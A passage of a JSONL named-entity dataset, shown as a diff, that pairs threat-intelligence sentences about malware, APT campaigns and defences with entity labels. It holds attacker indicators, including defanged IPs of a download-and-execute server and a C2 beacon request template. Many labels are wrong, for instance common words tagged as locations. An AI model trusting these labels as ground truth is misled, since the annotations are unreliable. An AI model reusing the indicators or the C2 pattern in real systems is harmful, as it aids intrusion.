us.","entities":[{"id":50141,"label":"threat-actor","start_offset":36,"end_offset":45},{"id":50142,"label":"threat-actor","start_offset":50,"end_offset":59}],"relations":[],"Comments":[]} +{"id":598,"text":"As you can see in Figure 1 below, throughout 2017, the Hancitor attacks show clear spikes in their occurrence and these spikes happen during the middle of the week.","entities":[{"id":46192,"label":"TIME","start_offset":45,"end_offset":49},{"id":46191,"label":"SOFTWARE","start_offset":55,"end_offset":63}],"relations":[],"Comments":[]} +{"id":3312,"text":"Code showing the command to target Sogou Explorer GetBrowsersLogins","entities":[{"id":48397,"label":"SOFTWARE","start_offset":35,"end_offset":49}],"relations":[],"Comments":[]} +{"id":14202,"text":"This is what makes GitHub\u2014an online repository hosting service that provides version control management\u2014popular.","entities":[],"relations":[],"Comments":[]} +{"id":5408,"text":"In the case of Cyclops Blink, we have seen devices that were compromised for over 30 months (about two and a half years) in a row and were being set up as stable C&C servers for other bots.","entities":[{"id":51401,"label":"malware","start_offset":15,"end_offset":28}],"relations":[],"Comments":[]} +{"id":3964,"text":"We provide some security recommendations to ensure that enterprises and organizations can defend against web shell attacks: ","entities":[{"id":49824,"label":"attack-pattern","start_offset":105,"end_offset":122}],"relations":[],"Comments":[]} +{"id":4758,"text":"Google Safe Browsing helps protect over four billion devices every day by showing warnings to users when they attempt to navigate to unsafe sites or download harmful files.","entities":[{"id":50663,"label":"SOFTWARE","start_offset":0,"end_offset":20}],"relations":[],"Comments":[]} +{"id":2063,"text":"This repository contained a Python script that would decrypt a secondary Python script which reached out to the IP 167[.]86[.]87[.]27 to download and execute another Python script.","entities":[{"id":6141,"label":"IPV4","start_offset":115,"end_offset":133}],"relations":[],"Comments":[]} +{"id":3159,"text":"Open APIs from here link to products like Trend Micro Cloud One to enhance existing detection and response efforts.","entities":[{"id":48276,"label":"SOFTWARE","start_offset":0,"end_offset":8},{"id":48277,"label":"SOFTWARE","start_offset":42,"end_offset":63}],"relations":[],"Comments":[]} +{"id":11816,"text":"When a site identified by Safe Browsing as harmful appears in Google Search results, we show a warning next to it in the results.","entities":[],"relations":[],"Comments":[]} +{"id":6904,"text":"In 2019, one in five accounts that received a warning was targeted multiple times by attackers.","entities":[],"relations":[],"Comments":[]} +{"id":13339,"text":"After logging in to the active directory server, the threat actor modifies the active directory server group policy object \u2014 this includes a request that all domain account members create a scheduled task and execute the malware.","entities":[{"id":41516,"label":"attack-pattern","start_offset":190,"end_offset":204},{"id":41517,"label":"location","start_offset":205,"end_offset":208}],"relations":[],"Comments":[]} +{"id":3796,"text":"ChessMaster\u2019s current iteration starts off with the familiar phishing attacks seen in the earlier campaigns that involved the use of an email with an attached malicious document using the doc, docx, rtf, csv and msg formats.","entities":[{"id":49659,"label":"malware","start_offset":0,"end_offset":11},{"id":49660,"label":"attack-pattern","start_offset":61,"end_offset":77}],"relations":[],"Comments":[]} +{"id":10253,"text":"Technical analysis of Google Drive RAT Figure 1. Spear phishing email from Pawn Storm \u2013 collected in August 2020. ","entities":[{"id":31343,"label":"attack-pattern","start_offset":55,"end_offset":69},{"id":31344,"label":"threat-actor","start_offset":81,"end_offset":91}],"relations":[],"Comments":[]} +{"id":2411,"text":"It is widely used in the industry by various programs and systems due to its powerful features and ease of use.","entities":[],"relations":[],"Comments":[]} +{"id":898,"text":" PClock2 will also make a request to the following blockchain.info address to determine the current value of BTC.","entities":[{"id":46427,"label":"DOMAIN","start_offset":51,"end_offset":66},{"id":46426,"label":"malware","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} +{"id":14029,"text":" Figure 3. Freenki embedded resource ","entities":[{"id":47195,"label":"malware","start_offset":15,"end_offset":23}],"relations":[],"Comments":[]} +{"id":13922,"text":"As previously mentioned, DarkSide avoids victimizing companies in CIS countries.","entities":[{"id":48750,"label":"malware","start_offset":25,"end_offset":34},{"id":48751,"label":"location","start_offset":66,"end_offset":79}],"relations":[{"id":456,"from_id":48750,"to_id":48751,"type":"related-to"}],"Comments":[]} +{"id":1765,"text":"So this raises another question: If there are no mitigation functions, do we have any other ways to defend against attacks similar to this?","entities":[],"relations":[],"Comments":[]} +{"id":4488,"text":"Seven of the nine zero-day vulnerabilities our Threat Analysis Group discovered in 2021 were originally developed by commercial providers and sold to and used by state-sponsored actors.","entities":[{"id":50293,"label":"identity","start_offset":47,"end_offset":68},{"id":50294,"label":"vulnerability","start_offset":18,"end_offset":42}],"relations":[],"Comments":[]} +{"id":13184,"text":"The USBferry malware then tries to connect to the download site and uses a Windows command to collect\/copy target host data ","entities":[{"id":41137,"label":"tools","start_offset":4,"end_offset":12},{"id":41138,"label":"location","start_offset":64,"end_offset":67},{"id":41139,"label":"location","start_offset":107,"end_offset":113},{"id":41140,"label":"location","start_offset":114,"end_offset":118}],"relations":[],"Comments":[]} +{"id":10798,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} +{"id":2439,"text":"Figure 9 shows the example of executing Netcat to establish a reverse shell to a remote server on the compromised server.","entities":[{"id":7297,"label":"tools","start_offset":40,"end_offset":46},{"id":47508,"label":"attack-pattern","start_offset":50,"end_offset":75}],"relations":[],"Comments":[]} +{"id":4038,"text":"After our long-term monitoring, we observed that there are two different decryption algorithms (DES or AES) used in Nerapack to decrypt the payload.","entities":[{"id":49892,"label":"malware","start_offset":116,"end_offset":124}],"relations":[],"Comments":[]} +{"id":6965,"text":"Find certain files RHT Delete files ","entities":[],"relations":[],"Comments":[]} +{"id":9586,"text":"Once the attacker has logged in to the victim\u2019s account, HYPERSCRAPE checks to see if the language is set to English, changing it if not.","entities":[],"relations":[],"Comments":[]} +{"id":7578,"text":"After performing the check, it downloads the RC4-encrypted FlawedAmmyy RAT, decrypts it, and executes it as the final payload.","entities":[{"id":23627,"label":"location","start_offset":21,"end_offset":26},{"id":23628,"label":"malware","start_offset":59,"end_offset":70},{"id":23629,"label":"location","start_offset":89,"end_offset":92}],"relations":[],"Comments":[]} +{"id":7092,"text":"Pandora\u2019s public code repositories Rootkits From a Public Repository","entities":[{"id":22210,"label":"malware","start_offset":0,"end_offset":7},{"id":22211,"label":"location","start_offset":10,"end_offset":16},{"id":22212,"label":"location","start_offset":51,"end_offset":57}],"relations":[],"Comments":[]} +{"id":9599,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") select x).ToList","entities":[],"relations":[],"Comments":[]} +{"id":14141,"text":"While no attribution is perfect, there are striking similarities between the malware attributed to APT37 and Operation Earth Kitsune.","entities":[{"id":48201,"label":"threat-actor","start_offset":99,"end_offset":104},{"id":48202,"label":"campaign","start_offset":109,"end_offset":132}],"relations":[],"Comments":[]} +{"id":4638,"text":"It spoofs the user agent to look like an outdated browser, which enables the basic HTML view in Gmail.","entities":[{"id":50558,"label":"SOFTWARE","start_offset":96,"end_offset":101}],"relations":[],"Comments":[]} +{"id":5142,"text":"Right?","entities":[],"relations":[],"Comments":[]} +{"id":618,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":6021,"text":"While we are actively monitoring activity related to Ukraine and Russia, we continue to be just as vigilant in relation to other threat actors globally, to ensure that they do not take advantage of everyone\u2019s focus on this region.","entities":[{"id":18584,"label":"location","start_offset":9,"end_offset":12},{"id":18586,"label":"location","start_offset":61,"end_offset":64},{"id":18588,"label":"identity","start_offset":91,"end_offset":95},{"id":18589,"label":"location","start_offset":223,"end_offset":229}],"relations":[],"Comments":[]} +{"id":1391,"text":"Additionally, in order for this vulnerability to be exploited, the web server must be running PHP below 7.4.","entities":[{"id":46737,"label":"SOFTWARE","start_offset":94,"end_offset":97}],"relations":[],"Comments":[]} +{"id":1983,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":2835,"text":" Unit 42 research shows there is likely very little actual payment of ransom.","entities":[{"id":48044,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} +{"id":546,"text":"Instead, they instruct victims to install TOR and reach out to them on the darknet.","entities":[{"id":44773,"label":"tools","start_offset":42,"end_offset":45}],"relations":[],"Comments":[]} +{"id":11757,"text":"Because Google actively detects and disrupts phishing links sent via Gmail, the actors were observed driving targets to messaging apps like WhatsApp, Telegram or Discord.","entities":[{"id":36241,"label":"location","start_offset":32,"end_offset":35},{"id":36242,"label":"attack-pattern","start_offset":45,"end_offset":53}],"relations":[],"Comments":[]} +{"id":337,"text":"This is the same address used to register two other payment domains registered earlier this month:","entities":[],"relations":[],"Comments":[]} +{"id":9531,"text":"We also saw at least three different variants of Gh0st RAT, another malware family that has been in the wild for more than 10 years, being used in Earth Berberoka\u2019s campaign.","entities":[{"id":29239,"label":"malware","start_offset":49,"end_offset":58},{"id":29242,"label":"location","start_offset":165,"end_offset":173}],"relations":[],"Comments":[]} +{"id":754,"text":"The isolated heap was applied to many but not all internal objects, leaving some still vulnerable.","entities":[],"relations":[],"Comments":[]} +{"id":2053,"text":" Table 3. PDNS of 164[.]68[.]114[.]29 and 167[.]86[.]87[.]27 When looking at this infrastructure on VirusTotal, we observed that some of the domains we found were part of a VirusTotal graph called a.y.e\/ created by the user x4k on June 30, 2021.","entities":[{"id":6107,"label":"IPV4","start_offset":18,"end_offset":37},{"id":6109,"label":"IPV4","start_offset":42,"end_offset":60},{"id":47141,"label":"SOFTWARE","start_offset":101,"end_offset":111},{"id":47142,"label":"TIME","start_offset":232,"end_offset":245},{"id":47143,"label":"threat-actor","start_offset":225,"end_offset":228},{"id":47144,"label":"SOFTWARE","start_offset":174,"end_offset":184}],"relations":[],"Comments":[]} {"id":309,"text":"As with any tool, remote access applications can be used for good or malicious intent.","entities":[],"relations":[],"Comments":[]} -{"id":310,"text":"It would be inefficient for an administrator to travel to a physical office to make a change on a system, but its critical that organizations take control over these applications.","entities":[],"relations":[],"Comments":[]} -{"id":311,"text":"The first step is identifying them in your network.","entities":[],"relations":[],"Comments":[]} -{"id":312,"text":"Palo Alto Networks currently tracks 90 different remote-access applications in Applipedia.","entities":[{"id":45786,"label":"SOFTWARE","start_offset":79,"end_offset":89},{"id":44692,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} +{"id":4192,"text":"T1480 Execution Guardrails T1574.002","entities":[{"id":49995,"label":"attack-pattern","start_offset":6,"end_offset":36}],"relations":[],"Comments":[]} +{"id":170,"text":"Even a successful ransomware attack that is halted early by security software will achieve some level of damage \u2013 enough to make the victim consider paying the ransom to get the files back.","entities":[],"relations":[],"Comments":[]} +{"id":4023,"text":"Depending on the target, it uses backdoors with different protocols, and it can also use the reverse proxy to bypass the monitoring of network security systems.","entities":[],"relations":[],"Comments":[]} +{"id":2496,"text":"Palo Alto Networks Cortex XDR Prevent and Pro customers running agent version 7.4 and above with content version 450-87751 on Linux devices are protected from CVE-2022-22963 using the Java Deserialization module; customers running agent version 7.7 and content 480 and above are protected from CVE-2022-22963 and CVE-2022-22965 for both Windows and Linux using the Java Deserialization module; other OSes and exploits receive protections from post-exploitation activities using Behavioral Threat Protection, Password Theft Prevention, Anti Ransomware and other Anti Exploitation modules.","entities":[{"id":47587,"label":"vulnerability","start_offset":159,"end_offset":173},{"id":47585,"label":"SOFTWARE","start_offset":0,"end_offset":45},{"id":47588,"label":"SOFTWARE","start_offset":184,"end_offset":211},{"id":47590,"label":"vulnerability","start_offset":313,"end_offset":327},{"id":47591,"label":"SOFTWARE","start_offset":337,"end_offset":344},{"id":47593,"label":"SOFTWARE","start_offset":365,"end_offset":392},{"id":47586,"label":"SOFTWARE","start_offset":126,"end_offset":131},{"id":47589,"label":"vulnerability","start_offset":294,"end_offset":308},{"id":47592,"label":"SOFTWARE","start_offset":349,"end_offset":354}],"relations":[{"id":342,"from_id":47587,"to_id":47588,"type":"related-to"}],"Comments":[]} +{"id":1955,"text":"It can protect users against malware, zero-day and known exploits, privacy leaks, and application vulnerability.","entities":[{"id":47077,"label":"attack-pattern","start_offset":38,"end_offset":46},{"id":47079,"label":"attack-pattern","start_offset":86,"end_offset":111},{"id":47080,"label":"attack-pattern","start_offset":29,"end_offset":36},{"id":47081,"label":"attack-pattern","start_offset":67,"end_offset":80},{"id":47078,"label":"attack-pattern","start_offset":51,"end_offset":65}],"relations":[],"Comments":[]} +{"id":11011,"text":"We encourage anyone who discovers a Chrome vulnerability to report that activity through the Chrome Vulnerabilities Rewards Program submission process.","entities":[],"relations":[],"Comments":[]} +{"id":2990,"text":"d. Deleting or \u201cwiping\u201d data if too many bad passcodes are tried or if you active it remotely.","entities":[],"relations":[],"Comments":[]} +{"id":2894,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 12)]","entities":[],"relations":[],"Comments":[]} +{"id":4817,"text":"Follina is a remote code execution (RCE) vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).","entities":[{"id":50748,"label":"SOFTWARE","start_offset":62,"end_offset":110},{"id":50746,"label":"vulnerability","start_offset":13,"end_offset":54},{"id":50747,"label":"vulnerability","start_offset":0,"end_offset":7}],"relations":[{"id":1004,"from_id":50746,"to_id":50747,"type":"duplicate-of"},{"id":1005,"from_id":50748,"to_id":50747,"type":"has"}],"Comments":[]} +{"id":760,"text":"The main idea of this protection mechanism is to delay the freeing action so that the intruder is unable to determine when they can occupy the freed object using controlled data.","entities":[],"relations":[],"Comments":[]} +{"id":3761,"text":" We also observed some instances of injected payloads that were either trying to read authorized keys on vulnerable machines or were writing into the authorized_keys file to add to the machine\u2019s list of accepted keys.","entities":[],"relations":[],"Comments":[]} +{"id":6788,"text":"This particular behavior is a slight departure from previously reported attacks by Gamaredon, which did not use this technique.","entities":[],"relations":[],"Comments":[]} +{"id":4436,"text":"pipeCommunication.Close(); }","entities":[],"relations":[],"Comments":[]} +{"id":2131,"text":"As noted above, the PoC works only against systems that are vulnerable and meet both conditions for exploitability.","entities":[],"relations":[],"Comments":[]} +{"id":884,"text":"The \u2018P0\u2019 is statically set by the malware in the above request.","entities":[],"relations":[],"Comments":[]} +{"id":2498,"text":"Furthermore, customers can create a BIOC from an XQL query looking for the dropped webshell IoCs to detect exploitation attempts in their environments.","entities":[{"id":47600,"label":"attack-pattern","start_offset":83,"end_offset":91}],"relations":[],"Comments":[]} +{"id":1586,"text":" Conclusion Bad Rabbit is not as widespread of an attack as Petya\/NotPetya but is causing severe disruptions where it is occurring.","entities":[{"id":4729,"label":"malware","start_offset":13,"end_offset":23},{"id":4730,"label":"malware","start_offset":61,"end_offset":66},{"id":4731,"label":"malware","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} +{"id":5080,"text":"In line with our current disclosure policy, we are providing these details 30 days after the patch release.","entities":[],"relations":[],"Comments":[]} +{"id":756,"text":"They encapsulate this method and apply it to almost every object in mshtml.dll.","entities":[{"id":44855,"label":"FILEPATH","start_offset":68,"end_offset":78}],"relations":[],"Comments":[]} +{"id":13678,"text":"A phishing site imitates Office 365 login ","entities":[{"id":42549,"label":"attack-pattern","start_offset":2,"end_offset":10}],"relations":[],"Comments":[]} +{"id":10324,"text":"The MuddyWater campaign was first sighted in 2017 when it targeted the Saudi government using an attack involving PowerShell scripts deployed via Microsoft Office Word macro.","entities":[{"id":31465,"label":"location","start_offset":15,"end_offset":23},{"id":31468,"label":"attack-pattern","start_offset":114,"end_offset":124},{"id":31470,"label":"tools","start_offset":156,"end_offset":162}],"relations":[],"Comments":[]} +{"id":7327,"text":" Recommendations","entities":[],"relations":[],"Comments":[]} +{"id":3303,"text":"It will read the \u201cLocal State\u201d file to grab the AES secret key of Google Chrome-based browsers.","entities":[{"id":48387,"label":"SOFTWARE","start_offset":66,"end_offset":79}],"relations":[],"Comments":[]} +{"id":4535,"text":"The U.S. could also set an example to other governments by reviewing and disclosing its own historical use of these tools.","entities":[{"id":50329,"label":"identity","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} +{"id":5979,"text":"The group's tactics, techniques and procedures (TTPs) for these campaigns have shifted slightly from including phishing links directly in the email, to also linking to PDFs and\/or DOCs hosted on Google Drive and Microsoft One Drive.","entities":[{"id":18395,"label":"location","start_offset":32,"end_offset":35},{"id":18396,"label":"attack-pattern","start_offset":111,"end_offset":119},{"id":18398,"label":"location","start_offset":208,"end_offset":211}],"relations":[],"Comments":[]} +{"id":4395,"text":"GET http:\/\/{C2}\/Index.php?Ck=OK HTTP\/1.1","entities":[{"id":50205,"label":"URL","start_offset":4,"end_offset":31}],"relations":[],"Comments":[]} +{"id":5227,"text":"But there are also other threats stirring up as of late: attacks that spy on and steal data from specific targets, crossing over between desktops and mobile devices.","entities":[],"relations":[],"Comments":[]} +{"id":4841,"text":"The hack-for-hire landscape is fluid, both in how the attackers organize themselves and in the wide range of targets they pursue in a single campaign at the behest of disparate clients.","entities":[],"relations":[],"Comments":[]} +{"id":2528,"text":"They want to establish stellar reputations for \u201ccustomer service\u201d and for delivering on what they promise \u2013 that if you pay a ransom, your files will be decrypted (and they will not appear on a leak website).","entities":[],"relations":[],"Comments":[]} +{"id":8441,"text":"During the development stage, Android-created and open source components are subject to vigorous security reviews","entities":[{"id":26012,"label":"location","start_offset":46,"end_offset":49},{"id":26013,"label":"attack-pattern","start_offset":55,"end_offset":61},{"id":26014,"label":"location","start_offset":73,"end_offset":76},{"id":26015,"label":"location","start_offset":97,"end_offset":105}],"relations":[],"Comments":[]} +{"id":1541,"text":"Given the significant activity attributed to Sofacy, and the new evidence directly targeting the diplomatic community, Palo Alto Networks wants to ensure that foreign affairs agencies around the world understand how the attacks are carried out, and what agencies and personnel can do to protect themselves.","entities":[{"id":46809,"label":"threat-actor","start_offset":45,"end_offset":51},{"id":46810,"label":"identity","start_offset":119,"end_offset":137}],"relations":[],"Comments":[]} +{"id":2921,"text":" Unit 42 has just released new research showing that attackers are indeed continuing to adapt existing techniques to generate cryptocurrency.","entities":[{"id":48091,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} +{"id":3880,"text":"Trend Micro OfficeScan\u2122 with XGen\u2122 endpoint security","entities":[{"id":49737,"label":"SOFTWARE","start_offset":0,"end_offset":34}],"relations":[],"Comments":[]} +{"id":7155,"text":"New HyperBro and Pandora samples found December 2020:","entities":[{"id":22376,"label":"malware","start_offset":4,"end_offset":12},{"id":22377,"label":"location","start_offset":13,"end_offset":16}],"relations":[],"Comments":[]} +{"id":13385,"text":"To protect our users, Google\u2019s Threat Analysis Group (TAG) routinely hunts for 0-day vulnerabilities exploited in-the-wild.","entities":[],"relations":[],"Comments":[]} +{"id":6279,"text":" Organizations should block access to the following domains to prevent Filmkan from receiving updates from the attacker.","entities":[],"relations":[],"Comments":[]} +{"id":5405,"text":"Once an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying, or anything else that the attacker wants to do.","entities":[],"relations":[],"Comments":[]} +{"id":4335,"text":"It should be noted that most of the compilation timestamps of these DLL files have been modified by the attacker to a year in the far future (2060, 2099 \u2026), and the server IP addresses are often hidden behind CloudFlare.","entities":[{"id":50130,"label":"SOFTWARE","start_offset":209,"end_offset":219}],"relations":[],"Comments":[]} +{"id":2575,"text":"Hear from innovators and experts, gain real-world skills through hands-on sessions and interactive workshops, and find out how breach prevention is changing the security industry.","entities":[],"relations":[],"Comments":[]} +{"id":11499,"text":"We assess this actor is a former initial ransomware access broker who previously worked with the Conti ransomware group distributing the IcedID banking trojan based on overlaps in infrastructure, tools used in previous campaigns, and a unique cryptor.","entities":[{"id":35171,"label":"threat-actor","start_offset":97,"end_offset":102},{"id":35172,"label":"malware","start_offset":137,"end_offset":143},{"id":35173,"label":"location","start_offset":230,"end_offset":233}],"relations":[],"Comments":[]} +{"id":10532,"text":"We received leads from Graphika that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} +{"id":2300,"text":"As is our policy, we quickly reported this 0-day to the vendor (Apple) and a patch was released to protect users from these attacks.","entities":[{"id":47367,"label":"identity","start_offset":64,"end_offset":69}],"relations":[],"Comments":[]} +{"id":14019,"text":"When the version resource is compiled into the binary, a language ID is generated and created not in the resource payload but in the internal structure of the resource information that is not visible with Windows Explorer.","entities":[{"id":47188,"label":"SOFTWARE","start_offset":205,"end_offset":221}],"relations":[],"Comments":[]} +{"id":1432,"text":"For example, BlueBox recently revealed the Fake ID vulnerability, which exploits an app\u2019s certificate verification process within the Android OS.","entities":[{"id":46764,"label":"identity","start_offset":13,"end_offset":20},{"id":46765,"label":"SOFTWARE","start_offset":134,"end_offset":144}],"relations":[],"Comments":[]} +{"id":4022,"text":"The group knows how to bypass security settings and keep its operation unobstructive.","entities":[],"relations":[],"Comments":[]} +{"id":5972,"text":"Malware samples:","entities":[],"relations":[],"Comments":[]} +{"id":2331,"text":"There was code to download a file from a C2 but we did not come across any URL strings in the Mach-O so we checked the javascript and saw there were two arguments passed when the binary is run\u2013the url for the payload and its size","entities":[],"relations":[],"Comments":[]} +{"id":11883,"text":"During our investigation we discovered several documents uploaded to VirusTotal.","entities":[],"relations":[],"Comments":[]} +{"id":91,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} +{"id":840,"text":"When talking about operating systems with security permissions and controls like Windows or UNIX\/Linux, the kernel operates with the highest level of control.","entities":[{"id":46392,"label":"SOFTWARE","start_offset":97,"end_offset":102},{"id":46391,"label":"SOFTWARE","start_offset":92,"end_offset":96},{"id":44885,"label":"SOFTWARE","start_offset":81,"end_offset":88}],"relations":[],"Comments":[]} +{"id":10909,"text":"For example, one of the samples that we had examined earlier, gathers files with the following extensions: .7z .asc .dgs .doc .docx .gpg .pdf .pgp .ppt .pptx .rar .rjv .rms .rtf .sft .tc .txt .xls .xlsx As we previously mentioned, there are no public reports of the StrongPity threat actor using malicious Android applications in the attack.","entities":[{"id":33202,"label":"location","start_offset":13,"end_offset":16},{"id":33203,"label":"location","start_offset":239,"end_offset":242},{"id":33204,"label":"location","start_offset":246,"end_offset":252},{"id":33205,"label":"malware","start_offset":268,"end_offset":278}],"relations":[],"Comments":[]} +{"id":3113,"text":" For end-users and those managing networks, the greatest risk these vulnerabilities pose is exploitation by malware seeking to gather information like usernames and passwords from systems. What makes these vulnerabilities most notable from a risk assessment point of view is breadth of exposure.","entities":[],"relations":[],"Comments":[]} +{"id":9370,"text":" Figure 6. Fake copyright info","entities":[],"relations":[],"Comments":[]} +{"id":2926,"text":"While XMRig isn\u2019t itself specifically malware, it\u2019s being delivered using malware-delivery techniques without the user\u2019s knowledge and consent just like malware.","entities":[{"id":48097,"label":"tools","start_offset":6,"end_offset":11}],"relations":[],"Comments":[]} +{"id":13580,"text":"The script replaces the page content with an authorization error message and redirects users to the phishing website Webshell\/PHP backdoor injection","entities":[{"id":51661,"label":"malware","start_offset":4,"end_offset":10}],"relations":[],"Comments":[]} +{"id":2228,"text":"This process name is associated with the South Korean-based AhnLab security software provider.","entities":[{"id":47326,"label":"location","start_offset":41,"end_offset":53},{"id":47327,"label":"identity","start_offset":60,"end_offset":66}],"relations":[],"Comments":[]} +{"id":8817,"text":"As the course of the COVID-19 pandemic evolves, we\u2019ve seen threat actors evolve their tactics as well.","entities":[],"relations":[],"Comments":[]} +{"id":822,"text":"Researcher Tal Be\u2019ery released a blog titled \u201cWin 10 Crypto Vulnerability: Cheating in Elliptic Curve Billiard 2\u201d that does a fantastic job at explaining this bug.","entities":[{"id":2688,"label":"location","start_offset":136,"end_offset":139},{"id":46370,"label":"SOFTWARE","start_offset":46,"end_offset":52},{"id":44874,"label":"identity","start_offset":11,"end_offset":21}],"relations":[],"Comments":[]} +{"id":9112,"text":"When 2014 rolled in, Lurk started exhibiting some patterns similar with the Angler exploit kit.","entities":[{"id":28128,"label":"threat-actor","start_offset":21,"end_offset":25}],"relations":[],"Comments":[]} +{"id":1638,"text":"While the name \u201cOscar Sanchez\u201d may be a pseudonym","entities":[{"id":45082,"label":"identity","start_offset":16,"end_offset":29}],"relations":[],"Comments":[]} +{"id":746,"text":" To deal with the increasing number of use-after-free bugs and associated exploits, Microsoft introduced a series of new control mechanisms in the most recent Internet Explorer patches.","entities":[{"id":46340,"label":"identity","start_offset":84,"end_offset":93},{"id":46341,"label":"SOFTWARE","start_offset":159,"end_offset":176}],"relations":[],"Comments":[]} +{"id":12847,"text":"Security teams can leverage the MITRE ATT&CK framework to tell a story that helps simplify security communication across their organization.","entities":[{"id":40038,"label":"location","start_offset":0,"end_offset":8},{"id":40039,"label":"location","start_offset":15,"end_offset":18},{"id":40040,"label":"malware","start_offset":19,"end_offset":27},{"id":40042,"label":"location","start_offset":58,"end_offset":62},{"id":40043,"label":"location","start_offset":65,"end_offset":70},{"id":40044,"label":"location","start_offset":91,"end_offset":99}],"relations":[],"Comments":[]} {"id":313,"text":" Examples include Remote Desktop Protocol (RDP), Virtual Network Connection (VNC), TeamViewer, and even Secure Shell (SSH), to name a few.","entities":[{"id":1072,"label":"attack-pattern","start_offset":18,"end_offset":41},{"id":1075,"label":"tools","start_offset":83,"end_offset":93},{"id":1073,"label":"tools","start_offset":43,"end_offset":46},{"id":46010,"label":"tools","start_offset":104,"end_offset":122},{"id":46011,"label":"tools","start_offset":49,"end_offset":81}],"relations":[],"Comments":[]} -{"id":314,"text":" Once you can identify the traffic, you need to separate the good from the bad.","entities":[],"relations":[],"Comments":[]} -{"id":315,"text":"If your company runs Windows and relies on RDP, you can close off VNC, TeamViewer and the other 87 applications because you don’t need them.","entities":[{"id":44693,"label":"SOFTWARE","start_offset":21,"end_offset":28},{"id":44694,"label":"tools","start_offset":43,"end_offset":46},{"id":44695,"label":"tools","start_offset":66,"end_offset":69},{"id":44696,"label":"tools","start_offset":71,"end_offset":81}],"relations":[],"Comments":[]} -{"id":316,"text":"If your administrators and help desk are the only ones who need RDP access to your systems, disable RDP for the rest of your users.","entities":[{"id":46013,"label":"SOFTWARE","start_offset":100,"end_offset":103},{"id":46012,"label":"SOFTWARE","start_offset":64,"end_offset":67}],"relations":[],"Comments":[]} -{"id":317,"text":"The key is putting a policy in place and making sure your technology is enforcing that policy at the network layer.","entities":[],"relations":[],"Comments":[]} -{"id":318,"text":" The Backoff and Citadel reports from last week highlight how uncontrolled remote access broadens your attack surface and acts as a backdoor for attackers already in your network.","entities":[{"id":1095,"label":"malware","start_offset":5,"end_offset":12},{"id":1097,"label":"malware","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} -{"id":319,"text":"Remote-access abuse is not a new problem.","entities":[{"id":46014,"label":"attack-pattern","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} -{"id":320,"text":"We’ve been highlighting the importance of controlling this threat since 2009, but five years later it remains an issue for many organizations.","entities":[{"id":46015,"label":"TIME","start_offset":66,"end_offset":76}],"relations":[],"Comments":[]} -{"id":321,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":322,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":323,"text":" By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":324,"text":"The latest development in the ransomware world is CryptoWall 2.0, a new version of this malware family that uses the Tor network for command and control.","entities":[{"id":44699,"label":"malware","start_offset":50,"end_offset":64},{"id":44700,"label":"tools","start_offset":117,"end_offset":120}],"relations":[{"id":14,"from_id":44699,"to_id":44700,"type":"uses"}],"Comments":[]} +{"id":10678,"text":"As Trend Micro reported, these two are path traversal vulnerabilities that allow attackers to map URLs to files\/directories outside of the webroot.","entities":[{"id":32598,"label":"location","start_offset":35,"end_offset":38},{"id":32599,"label":"attack-pattern","start_offset":39,"end_offset":53}],"relations":[],"Comments":[]} +{"id":6524,"text":"Tool for accessing browser DBs 1.exe 78b1ab1b8196dc236fa6ad4014dd6add142b3cab583e116da7e8886bc47a7347 HackTool.Win64.LIGOLO.A LIGOLO tunneling tool ","entities":[{"id":20230,"label":"location","start_offset":0,"end_offset":4},{"id":20231,"label":"SHA2","start_offset":37,"end_offset":101},{"id":20232,"label":"location","start_offset":143,"end_offset":147}],"relations":[],"Comments":[]} +{"id":560,"text":"The 25.1 BTC amount was worth $1.18 million at that time, and now is about $876,000.","entities":[],"relations":[],"Comments":[]} +{"id":14187,"text":"What we can expect If this kind of escalation were to take place, it may begin through deployment of known destructive malware like IsaacWiper, HermeticWiper and WhisperKill onto already compromised targets or systems known to be vulnerable.","entities":[{"id":48224,"label":"malware","start_offset":132,"end_offset":142},{"id":48226,"label":"malware","start_offset":162,"end_offset":174},{"id":48225,"label":"malware","start_offset":144,"end_offset":158}],"relations":[],"Comments":[]} +{"id":14151,"text":"Many organizations have been adopting EDR (Endpoint Detection & Response) as a way to obtain more data about attacks on the endpoint.","entities":[],"relations":[],"Comments":[]} +{"id":788,"text":"For example, you can call MemoryProtection::CMemoryProtector::UnprotectProcess before you perform any fuzzing tasks.","entities":[{"id":46350,"label":"attack-pattern","start_offset":102,"end_offset":109}],"relations":[],"Comments":[]} +{"id":6972,"text":"In 2020, Earth Karkaddan used an updated version of the AhMyth Android RAT to target Indian military and government personnel via a disguised porn app and a fraudulent national Covid-19 tracking app.","entities":[{"id":21834,"label":"malware","start_offset":63,"end_offset":74},{"id":21835,"label":"location","start_offset":78,"end_offset":84},{"id":21837,"label":"location","start_offset":101,"end_offset":104},{"id":21838,"label":"location","start_offset":151,"end_offset":154},{"id":21839,"label":"location","start_offset":168,"end_offset":176}],"relations":[],"Comments":[]} +{"id":669,"text":"If the user has not enabled macros, a popup window will appear asking the user to click to do so.","entities":[],"relations":[],"Comments":[]} +{"id":7844,"text":" While there is still debate about how to store passwords in internal storage, if Android internal storage isn\u2019t accessible to anything but the application that owns it, it remains secure.","entities":[],"relations":[],"Comments":[]} +{"id":4431,"text":"Process process = new Process(); 